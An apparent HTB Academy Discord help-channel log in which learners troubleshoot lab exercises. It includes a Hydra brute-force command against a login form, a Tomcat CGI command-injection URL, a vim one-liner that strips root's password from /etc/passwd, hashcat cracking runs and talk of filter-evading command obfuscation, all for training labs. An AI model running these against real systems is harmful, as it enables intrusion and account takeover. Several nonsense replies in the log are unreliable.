Im sorry but I cant see what wrong with it. I have tried every possible solution and I have been going trough the module all over again and I cant see it
use double [[if...]]
Check the Name of the HTML Elements (Like form fields, etc)
Think about what exactly hydra does and what exactly hydra needs to do it.
What part is the HTML Elements? This part? "/admin_login.php.:username=user&password=^PASS^:F=<form name='login'"
Yes, the names are wrong.
didn't get that much help
still not getting right ans
Check again in the module what exactly an If statement must look like and then check the code again.
Also check your code again with the code from the module.
Delete your script, then paste the script from the module and add ONLY your If statement. Don't touch anything else.
Here you can find the code:
https://academy.hackthebox.com/module/21/section/129
so my initial code was giving me the ans but it was wrong but now i thought it could be +1 or -1 of the output and as soon as i inputted +1 my ans became right
now i am thinking hard what i could do to get the right ans without increasing it manually
and by thinking for few min i think culprit was echo -n
without -n i got the right ans
🙂
thx for ur help
Is Information Gathering - Web Edition, "vHosts" section broken?
I'm tasked to find 4 flags on 4 subdomains. I find them, but two flags are identical and obviously only work for one answer
Also one question says Enumerate the target and find a vHost that contains flag No. 3 but the flag that works for this question starts with something along the lines of HTB{flag_four_...
(coincidentally the question mentioning a "flag No. 4" is the one I can't submit an answer for, with the 4th subdomain I found)
maybe there's a 5th flag that works for the 4th flag question........ KEKW
no
i got all the flags
can I DM you to confirm pls?
sure
hydra -l user -P /usr/share/wordlists/rockyou.txt -f 94.237.62.195 -s 37272 http-post-form “/admin_login.php:username=^USER^&paswords=^PASS^:F=<form name=’login’” I got to this point but now i get error instead
Look at the source code. The names are wrong.
I did this now and succeeded sudo hydra -L /opt/useful/SecLists/Usernames/top-usernames-shortlist.txt -P /opt/useful/SecLists/Passwords/Leaked-Databases/rockyou.txt -u -f 94.237.62.195 -s 37272 http-post-form "/admin_login.php:username=^USER^&password=^PASS^:F=<form name='login'"
but i do not get forward when i type username and password on the admin page
Yes, because the names of the HTML elements are still wrong. So Hydra gives you false positives.
Can you please show me whats wrong with this @acoustic owl
i have been sitting with one question all day I cant see whats wrong
The names of the HTML elements are wrong.
HTML elements are things like form fields, etc.
I get that something is wrong here "/admin_login.php:username=^USER^&password=^PASS^:F=<form name='login'" but I dont see whats wrong
i checked the link but I still dont see it
Have a look at the source code and then search for password
Think about how hydra works and what hydra does exactly. Then think about which things you pass on to hydra...
ㅎ
Hi I know I'm bit stupid here but don't know what's going on in this module. I url encoded the payload and executing it but the payload is not getting executed. I'm in "Attacking Tomcat CGI" module.
Payload I used "http://IP:8080/cgi/welcome.bat?&c%3A\windows\system32\whoami.exe"
Maybe Burp can also help you see what exactly is wrong.
Intercept a login request with Burp.
sudo hydra -L /opt/useful/SecLists/Usernames/top-usernames-shortlist.txt -P /opt/useful/SecLists/Passwords/Leaked-Databases/rockyou.txt -u -f 94.237.62.195 -s 37272 http-post-form "/admin_login.php:user=^USER^&pass=^PASS^:F=<form name='login'" okay i saw in burp that it was user and pass instead
There is one more HTML element name that is also wrong. Look in the source code of the website.
and use sudo only when it is really needed
sudo hydra -L /opt/useful/SecLists/Usernames/top-usernames-shortlist.txt -P /opt/useful/SecLists/Passwords/Leaked-Databases/rockyou.txt -u -f 94.237.62.195 -s 37272 http-post-form "/admin_login.php:user=^USER^&pass=^PASS^:F=<form name='admin_login'" tried this now but still getting wrong passwords
Why do you use sudo?
An HTML element is still wrong.
Okey no more sudo but I have been reading through the whole module and I cant find the answer for whats wrong
Because the module does not give you 1:1 instructions that you can simply copy.
You need to understand what hydra does exactly.
Then look at your command and look at the source code of the website, then you know what you need to change.
Finally yea I see the problem now forgot the -
but now i got it atleast
thank for the help
whats the best books for hacking for beginners
hello there I'm actually on the AD Administration: Guided Lab Part II.
After applying with this command
Add-Computer -ComputerName ACADEMY-IAD-W10 -LocalCredential ACADEMY-IAD-W10\image -DomainName INLANEFREIGHT.LOCAL -Credential INLANEFREIGHT\htb-student_adm -Restart
I try to Check OU Membership of a Host with the command :
Get-ADComputer -Identity "ACADEMY-IAD-W10" -Properties * | select CN,CanonicalName,IPv4Address
But got the error message :
Get-ADComputer : The server has rejected the client credentials.
At line:1 char:1
+ Get-ADComputer -Identity "ACADEMY-IAD-W10" -Properties ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : SecurityError: (INLANEFREIGHT\htb-student_adm:ADComputer) [Get-ADComputer], Authenticati
onException
+ FullyQualifiedErrorId : ActiveDirectoryCmdlet:System.Security.Authentication.AuthenticationException,Microsoft.A
ctiveDirectory.Management.Commands.GetADComputer
Can anyone explain to me what I am doing wrong?
For question 3 of this link(https://academy.hackthebox.com/module/112/section/1069) the question being "What is the IPv4 address of the hostname DC1? " I tried typing 'nslookup DC1' and this is the result I got.
What am I doing wrong?
You are asking the wrong DNS resolver.
How is Cloudflare Resolver supposed to know what you mean by DC01?
So how do I figure out what DNS resolver to ask for
think about which DNS server here might know the answer
Would I have to determine what DNS authoritative server the hostname "DC1" is part of
is there something wrong with HTB today? my box always seems to die after a set amount of time
So would any of these two servers be associated with the hostname DC1
No
the first is from Cloudflare
the second one is from google
So would I use a local dns authoritative server, not Cloudflare or google
What is needed for running an Active Directory?
Domain controller?
Yes, and?
DNS server?
Ask this server
I am not sure how to ask dns server anything given that when I asked chat gpt this question , they return these suggestions that I previously tried but it failed for me
You can query a specific server like this:
nslookup example.com 10.10.10.10
or with dig
dig example.com @10.10.10.10
Should I not replace example.com with hostname DC1
yes of course 🙂
For the last question in the module https://academy.hackthebox.com/module/18/section/80, I'm not getting curl response for curl https://www.inlanefreight.com >htb.txt what am I doing wrong ? need help 🙂
Hi, I'm at password attacks hard module, I found ||johanna credentials and I'm trying with hashcat to decrypt keepass login|| but I can't, it's spending a lot of time without finding the key, any hints? thanks
Good morning everyone! I am getting an error when trying to run ssh2john to crack a ssh key. How do I call python 2 to run when trying to run ssh2john instead of python3? Thank you for your help!
python2 code to run.py
So would it be python2 ssh2john.py?
first did you run cmd as administrator? also you can try tools like cme for this
Yes sir
if you are on the pwnbox try python2.7 /usr/share/john/ssh2john.py
hint use the mutated wordlist
TY!
Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible
anyone ?
best thing i can give you about that without directly giving you the answer is google
i've found ||Candidates.#1....: Victoria2020 -> Yellow99!||
don't work
of course don't use those
after hashcat is done add --show in the end of your hashcat command run it again
not work
Anyone know why I'm not able to connect? It's the first lesson of the windows module.
The code is the same that they use in the example, but I get certificate errors instead of a remote windows unit
try /cert:ignore
It would appear so yes
maybe I'll try to password they used for themselves in their video example, that eliminated the cert issue now it's a logon issue
So I tried using the python2.7 /usr/share/john/ssh2john.py but I am getting a permission denied.. Any output I put it denies me. I have never felt so dumb
first there is no video on the academy and what module and section are you in?
send me a screenshot of that hashcat command but with the --show at the end
||hashcat -m 13400 -a 0 hashjohannakeepass mut_password.list -S||
nothing don't working
i mean a screenshot of what happen when you run it
This is the instructions given, however the above video example in the module used a password that ended up working for me. Maybe we should update the written password from Password, it seems like a pretty straight forward instruction.
this is the example I'm referring to
which module and section are you on? also all example are placeholder so don't directly use the whole example command without changing anything
I used our target IP, This is introduction to windows as a part of cyber security fundamentals
lesson 1
the windows fundamentals module?
no idea what's the issue this part is straightforward but shoot me a dm with that hash
Yes, module 1 Windows Fundamentals
under the Questions part it's clearly stated that RDP to with user "htb-student" and password "Academy_WinFun!"
Okay, I see that now, I still don't understand why you would give a direct connecting command to use arbitrarily
also you may want to do the intro to academy module because you are on the module Windows Fundamentals and Introduction to Windows section there is no number for the academy modules
This is my 4th module within my current path
I've already done the intro to academy, it's the first path everyone has to take
I just finished intro to linux.
I can't remove the ||x ||for root in this section - https://academy.hackthebox.com/module/51/section/1844 using ||/usr/bin/vim.basic /etc/passwd ||and editing or the command provided ||echo -e ':%s/^root:[^:]*:/root::/\nwq' | /usr/bin/vim.basic -es /etc/passwd||. The capabilities are these per enumeration in the screenshot. Can someone help me with what i'm missing?
try with ! so nwq!
ty
Why did this work? Shouldn't I have been able to edit the file manually also?
for why that work i got no idea that's what i have in my note lol and yes you should be able to do this manually
oh wait it's vim so wq is for write + quit but i always use wq! to exit vim
i mean vim have multiple article about how to exit it 🤣
true that. Upon manually making the change it wouldn't let me save and exit though
Any help with Footprinting medium? I don't understand, even after connecting the the MSSQL server and opening every single table and folder in that DB, there is no relevant information regarding the user HTB, what am I supposed be looking for?
there is
hello y'all, I'm having this issue with Msf::OptionValidateError The following options failed to validate: SESSION
i need help with advanced command obfuscation
Reading the hint and your reassurance helped me get it, thank you
what I'm trying to set an autoroute in MSF, I replicate the commands explained in the module
googling I couldn't find something useful, any idea what I'm missing or doing wrongly?
What is not working?
^
find and tail have nothing to do with each other either.
https://www.man7.org/linux/man-pages/man1/find.1.html
oh i forgot to mention its inside a subshell $()
try to use find and tail -n with $() , find keeps taking -n as its argument rather than tail
how can i post a screen shot
read and follow #welcome
find does not know option -n
read the man page which I have linked above
this
You do not pass tail a text file
You can try something like cat mytextfile.txt | tail -n 1
they use subshells for these bypassing but i cant use that for some reason
Find the output of the following command using one of the techniques you learned in this section:
the other techniques are similar only they all use subshells
one reverses the command and another changes case of command but they both use subshells to execute
without tail it worked and it showed a load of output
i then tried to manually scroll down and get to last one but it was not accepted as right answer
The module shows you how to obfuscate a command. Use this technique
use tail -n 1 < <(find .)
how to use it inside a subshell
Read the module again. Everything is really explained.
Use a modul-figurant at the end of the ESC tablet
The command already specifies in the question. You only have to modify/obfuscate it so that you can submit it.
The compressor uses L-lite modullars for the screen to twist
tail -n 1 < <(find .) )
Use the command as in the question.
What you do now is to query your own machine 😉
wdym, the commands are filtered i need to obfuscate them
but then to decode and run them i need to use subshell
but then find and tail are hating each other
The section shows how you can do this. Read the section again.
It's a command liner that's systematically doing this
(tail -n 1 < <(find /usr/share/ |grep root | grep mysql | base64) | base64 -d
idk tho i haven’t done that module before
i could bypass commands by adding quotes but i cannot bypass pipe without using subshells right
No
This is the command
find /usr/share/ | grep root | grep mysql | tail -n 1
😉
tailness
can you please tell the answer, i've been trying this for like 6 hrs continuously now


can i get a hint atleast, like without subshell how is it even possible
even the machine reset like 4 times :(
https://academy.hackthebox.com/module/109/section/1039
It is described here....
You need a subshell, but not in the command itself
shit i finally finished it i used ||eval|| is that what you were hinting
The cyber network files are not in the Linux, linus, grants of the debugger granting it
No, I didn't mean ||eval|| either
You can use the command exactly as in the question.
You just have to obfuscate it as described in the module.
Read the Chapter ||Encoded Commands|| again
Good afternoon! Excuse me for bothering the community on such a simple issue. Who was able to answer the question: "Bloodhound - Skill Assessment," B: Find the percentage of users with a path to GLOBAL ADMINISTRATOR. Enter a number as the answer (up to two decimal places, i.e. 11.78).
Hey all, I'm doing "Initial Enumeration of the Domain"
so i launch wireshark in pwnbox and i'm gettting this error message
nvm i got it to work
In the cheatsheet linked, there is a version without Azure.
You can then take this query and adapt it accordingly so that it works for Azure
Module: CROSS-SITE SCRIPTING (XSS) - Session Hijacking
From my vm and from pwnbox I can't connect to the server.
I tried the url with http, but it automatically set it back to https.
To get a connection I changed the server. Generated new files for openvpn and tried to use the pwnbox. With pwnbox I had temporaly a connection. What can I do now?
What do you want to ask him?
anyone can help me with attacking common services module, in the Attacking smb?
i'm trying to brute force user jason, but it's not working
Why not using smb?
What did you try?
this
Is this the list from the module?
Try another tool
Did you rename the list?
im facing an error
smb: \> get Backup.vhd
parallel_read returned NT_STATUS_IO_TIMEOUT
im getting this error since the morning
now it's 2 days and i cannot get it
#Module: DACL Attacks I
#Section: DACLs Overview
#Sub-section: Local Kernel Debugging
It briefly glosses over using windbg and local kernel debugging, yet I have absolutely no clue how to use either. Searching "windbg" in HTB Academy only turns up the DACL Attack module. Can anyone point me in the right direction here?
It is only touched upon very briefly.
After that, there is a link to Microsoft. There is nothing more and it is not needed to finish the module.
https://academy.hackthebox.com/module/147/section/1320
Can anybody provide some sort of hint? I'm on the Credential Hunting in Linux section for the Password Attacks module. I made it into the target machine, I searched multiple hackthebox forum topics.
I can't scp the shadow.bak to my machine so I can unshadow
Look at the section again.
It shows how you can find interesting things.
I tried LaZagne,
lol
I get an error
You have to upload the whole zip file.
@acoustic owl Very well. Thank you.
I'm sorry if this is off topic but I just joined the server and I have some problems
wait the exe, standalone?
Can someone help pls?
yeah sure go ahead
So I opened a htb account on my laptop but the email was the wrong one so now it keeps me at verify your email page and won't let me sign in with my other account
u can reach the support for this question
exe? on Linux? No…
I managed to get the zip over, thanks. Now I am getting a python error
I guess Ill keep trying idk
python is not even installed on the target machine though?
this is crazy
Need some help? Learn how to reach the support team on Academy.
it is installed…
you are logged in with kira, right?
try python3
omg for real??
python3 --version is different than python --version??
omg @acoustic owl you know what I did
thanks for helping me by the way
when I was trying the python command, i didn't capitalize the Z in lazagne so it said no file
Im sorry, i am literally at my wit's end when I come in here
Thank you very much
Sometimes the tab key helps 😉
You know how many rabbit holes I went down just for that? I can't imagine the real boxes. I tried cracking a zip, firefox_decrypt, unshadowing..
any advice please ?
Hi there
Sorry to bother you
Is there any ethical hacker? I need some help
this is not the server for that
read the #rules this channel is for HTB academy modules
by Guided Lab Part II you mean the skill assessment II right? if yes then hint you can't add a computer also there is no user with the username of htb-student_adm
It's the Introduction to AD module
After the restart, RDP to the target with htb-student_adm user instead of image
It's because image is a local account that you just use to setup and not a domain account, so you don't have rights to get info about the domain I think
If you still login as image you can also just specify the credentials again
Get-ADComputer -Identity "ACADEMY-IAD-W10" -Properties * -Credential INLANEFREIGHT\htb-student_adm | select CN,CanonicalName,IPv4Address
When you think you’re getting somewhere but it leads to nothing
So you dive in with full confidence, but in actuality it’s a waste of time
i see thank you
the get and mget both are not working on my attack box, same problem, timeout, but on the pwn box it is working
it feels so uncomfortable to work with the pwn box
is there anything else i can try to get the file
Module: Linux Fundamentals
Page 12: Filter Contents
Use cURL from your Pwnbox (not the target machine) to obtain the source code of the "https://www.inlanefreight.com" website and filter all unique paths of that domain. Submit the number of these paths as the answer.
I've already tried working on it myself and searching online but am struggling. Any help is greatly appreciated.
Found this solution that worked for me, but I don't understand it.
curl https://www.inlanefreight.com | tr " " "\n" | cut -d"'" -f2 | cut -d'"' -f2 | grep www.inlanefreight.com | sort -u | wc -l
I can't seem to understand why the following is needed
cut -d'"' -f2
Could someone please explain it? Thanks 😅
Look at the man page for cut and look at what the -d flag is
:) you can learn a lot about a command from its man page or -h (--help) flag [if it has one]
I saw the -d option is delimiter. I am guessing that the cut command has been used to remove single quotes or double quotes enclosing the URL? But I'm not sure if I'm right.
From my understanding so far, the cut command should only get rid of double or single quotes at the beginning of the URL?
Because if you're grabbing the source code, a lot of times links will be in single or double quotes
But when I viewed the output, it's gotten rid of the quotes at the end of URLs as well.
Yep
Because the delimiter is saying "hey we are breaking here" so it's excluding the delimiter
I just tested it out with a URL and it does remove the double quotes as expected, however, I don't seem to understand what the -f2 option does.
-f is telling it which side of the delimiter to use
Can anyone teach me hacking?
Thank you
Ok sure
INTRODUCTION TO THREAT HUNTING & HUNTING WITH ELASTIC Skills Assessment hunt2, I have been looking for the answer for a long time, can anyone give me a hint?
The query fields I use are event.code:"13" and process.name:"default.exe"
So, f2 indicates the right-hand side? So, then it should keep text from the right-hand side, no?
Let's say I have a file test.txt with the following content
something"www.google.com"something
When I run the following command:
cat test.txt | cut -d'"' -f2
Shouldn't the output keep text only from the right-hand side? So, I would expect the output to be www.google.com something but the output is instead www.google.com
Each field is separated by the delimiter
And -f tells you which
-f1 would be before the first delimiter,
I also now understand why the tr " " "\n" was necessary, so that two URLs aren't on the same line.
Yep
I will follow them
"\n" is the standard new line operation
For instance in most programming languages you can add a new line to break text up with \n
I wasn't aware the \n would work for text files in that manner. At first I thought it would just insert it as a string instead of behaving as the new line operation. Good to know.
Thanks for all your help.
Hi i am new to networking and doing INTRODUCTION TO NETWORKING I'm stuck on the Subnetting Questions just not understanding how to Split the network 10.200.20.0/27 into 4 subnets and submit the broadcast address of the 2nd subnet as the answer. And Split the network 10.200.20.0/27 into 4 subnets and submit the network address of the 3rd subnet as the answer.
whats wrong with bashfuscator
?
@thorn urchin
maybe you should verify your account
already done
nope
Are you sure you're doing mssql and not mysql.
clarifying: I meant you're using mssql to connect
yes
what they teach you vs what they ask in exam bruh its too hard
Wdym?
It's telling you to Auth to that ip with guest:guest and I guess that's lfi?
Or remote file read
the module definitely should tell you how to get there ¯_(ツ)_/¯
its command injection but i've been trying for like an hour and made 0 progress
the exercises were a piece of cake but this skill assessment is a dead end
Well skill assessments aren't necessarily meant to be easy
Just recheck that you've tried all the techniques. And that you've tried slight modifications to the techniques

If you can't pass the skill assessment it's a:
Try to create a new VPN profile with TCP. Maybe it helps.
Hey guys, I wanted to ask what are the best boxes for web pen-testing? or how can i search for them?
Oh ok then I just created an account thats why but thanks
Read #welcome
Hi all, would like to seek any hints/tips for this one.
I'm stuck as user dennis and cannot elevate to root. Tried hunting for credentials of root but no luck.
Examine the second target and submit the contents of flag.txt in /root/ as the answer.
Kinda helps if you tell us the module name
sry, here it is Password Attacks Lab - Medium
only / and \ are detected but whatever i try to inject it gives code 302, i don't understand why
Why does his ssh have a password?
hint please...
hmm i think i found something
hooray
let me figure this one 🙂
Hint: it's a small logic leap
which environment variable contains ; or & or |, i couldnt find any on my pc
YESS i finished it finally
environmental variables do not have any special characters.
Did you also understand all the attacks and can you use them? Even if the environment changes a little?
Is there a tech issue with the servers?
was in a session then got kicked out but now trying to rdp and it wont go through at all
Restart the lab and try again
did that twice including restarting linux
got this message: [15:42:34:715] [3005:3006] [ERROR][com.freerdp.core.connection] - Timeout waiting for activation [15:42:34:719] [3005:3005] [ERROR][com.freerdp.core] - freerdp_abort_connect:freerdp_set_last_error_ex ERRCONNECT_CONNECT_CANCELLED [0x0002000B]
i dont understand what path it needs
What is the path to htb-student's home directory?
Linux Fundamentals
read the section again ... it tells you what a path to a directory means and how to get it
cd ~; pwd
i cant join to ip, ssh htb-student@ip and then it need password, but terminal isnt working, i cant write password
it is working... it won't show the password you are typing (security feature) ... either type it or paste it (probably ctrl+shift+v) and then enter
I am at the module Attacking Common Services: Attacking SQL Databases - I found ||the credentials of mssqlsvc,|| now I don't know what to do, I tried ||login in mssql and rdp|| but nothing
Thanks^^
Hi guys, I'm stuck at the Service Scanning module.
Last question of the exercises.
When I run: smbclient -U bob \\10.129.42.254\users
it asked for the bob password.
Hint is: Bob likes to use weak passwords.
But all my password guesses are unsuccessful
Can someone help?
Bob's password has been shown in the material of the section
Basically you need to brute force it, but as he said the password in the module
okay got it thanks both of you @autumn pilot & @limber river
This is my first time with HTB and wooow
this integrated wm and the exercises are truly amazing for practicing
Enjoy
How good will I be at the end of the pentesting path?
Cpts? They said it takes you from beginner to intermediate level
what is Cpts?
Intermediate level okay, that's already quite a good level
CPTS is cert, you can book it after finishing the path
It's like proof of what you have learned
ah okayyy thanks
How do you get such a target machine with vulnerabilities (open port, etc..) that I can play with ?
You can find machines on the main platform
Thanks, I was meaning to build my own lab,
I found some interesting video on youtube, I will try that
so one last question please, how long will it take to finish the pentest path, if done full-time (8 hours/day)?
Depends on skill level. But with proper note taking it should take you some months
3-4 months
hi all, I am trying to run ligolo-ng on the internal info gathering (attacking enterprise applications) and I am getting this error however I have been told it works
if you are using an arm agent try the amd agent
ahhhh its x64 and target is x86
guys
does cancelling student subscription remove your access immediately? or will it be gone by the next renewal date?
Not sure, but I think next renewal date
Am I already logged in or should I wait a while?
you are correct.
that’s not an exploit buddy
help please!
hint domain login
try enable verbose to see what run and what stuck
how do I enable verbose in metasploit
just set verbose true
one of my server is cyberbullying me by giving me inappropriate username what to do
Sir this is a Wendy's
How much time it takes you to finish passwords attack?
No idea how that has any relevance to this channel or server. Just leave the other one or ignore it and move on.
about 4 days and I'm on my 3rd day just to get the backup file
on hard lab
It took 4 days and I'm still on the pth section
I'm working on Question 2 of the Limited File Uploads section of the File Upload Attacks module. I'm asked to view the source code of upload.php in order to get some information about the name of the uploads directory for this web app. I'm able to view the source code for uploads.php, but all it says is "Only SVG images are allowed." I don't see any information relevant to the uploads directory for the web app in the source code for upload.php.
hello, i wanna know if i can use the Pwnbox time that i have from the Academy , for the CTF on the machines.
is that possible? or is only for the academy?
It's only for academy platform
the pwnbox on both platform are for HTB only, although if your ctf go through public ip you can do it from the pwnbox but it's not recommended
i understand, thank you both
by "read the source code" they don't mean ctrl + U (in case that's what you did) but hint you can use a similar payload on Q 1
─$ hashcat -m 22100 /home/shadowalker/Downloads/mut_password.list backup.hash -o backup.cracked
hashcat (v6.2.6) starting
OpenCL API (OpenCL 3.0 PoCL 4.0+debian Linux, None+Asserts, RELOC, SPIR, LLVM 15.0.7, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
- Device #1: cpu-sandybridge-AMD Ryzen 5 5600H with Radeon Graphics, 2819/5702 MB (1024 MB allocatable), 6MCU
Minimum password length supported by kernel: 4
Maximum password length supported by kernel: 256
Counted lines in /home/shadowalker/Downloads/mut_password.listInsufficient memory available
zsh: segmentation fault hashcat -m 22100 /home/shadowalker/Downloads/mut_password.list backup.hash
hashcat wont work
anyone faced this problem before
can help me plz
the virtual machine has 8 gb ram + 6 cpu
edit never mind
sorry guys
I used the exact same technique I used for the first question but changed "flag.txt" to "upload.php." But when I look in the same spot where I looked for the content of flag.txt, I don't see anything. One uncertainty I have is that I knew flag.txt was in the root directory, but I don't know how to specify the path to upload.php since the whole problem is to find the name of the directory it's in.
where can i check the module tier? I want to see if i can access a certain module with a student subscription in htb academy.
specifically interested in this one: https://academy.hackthebox.com/course/preview/kerberos-attacks
It is a Tier III Module
ah damn. thanks - damn that really is 50 euros, the heck HTB 
With the Platinum subscription you get 1000 Cubes for €58
200 Cubes you get back
Got it! There are two different payloads referenced in the same subsection of one of the module sections, and I was using the wrong one.
is there anyone who can help me with AD enumeration and Attacks, skills assessment 1?
1000 + 200 + 40 + 8 + [...]
around 1250 cubes for 58€
Hi everyone, got a question about the Linux Priv Esc: Python Library Hijacking module. The question asked to follow through the examples given to get the flag in root, but I’ve found that some bits are not the same on the box that seem to be crucial to being able to work the examples, like the init.py file being unwritable to my user. I tried the other files in the list and those aren’t writable to the user either, and I can’t move things to the /tmp file to call my psutil.py file from there either. My brain is a bit fried so I probably missed something simple, but has anyone else had issues with this module?
I remember having similar issues and just checked, but method 1 should still work because you own the __init__.py file
ls -la /usr/local/lib/python3.8/dist-packages/psutil/__init__.py
-rw-r--r-- 1 htb-student staff 87657 Jun 8 09:21 /usr/local/lib/python3.8/dist-packages/psutil/__init__.py
To try out method 2 and 3, I remember getting root with method 1 and modifying permissions for /usr/lib/python3.8 for method 2 and maybe change /etc/sudoers file for method 3
finally guys special thx to the best guys here on the server and they helped me a lot through this module ❤️ @acoustic owl @vital adder @rustic sage @fiery berry
@vestal wing I'm going through the Game Hacking fundamentals course, where is the Hackman.exe file supposed to live? It doesn't appear to be included in the CheatEngine zip.
Anyone having any problem with labs? , I can't ping the labs
Careful when you @ multiple people. The mod may smack you
The online policeman here warns you immediately if you mark too many people at the same time.
This obviously did not happen here, so all is well.
I reset the lab couple times, VPN looks good
Idk what to do
I got a qst please in the section password attacks module, more specifically pass the hash part. We performed pth using mimikatz to access to a share over the network \DC01\user and then we performed pth using Invoke-TheHash to access to C:\julio\flag.txt. My qst is why C:\julio\flag.txt exists when performing pth with Invoke-TheHash meanwhile i cant find it using mimikatz ? Thanks in advance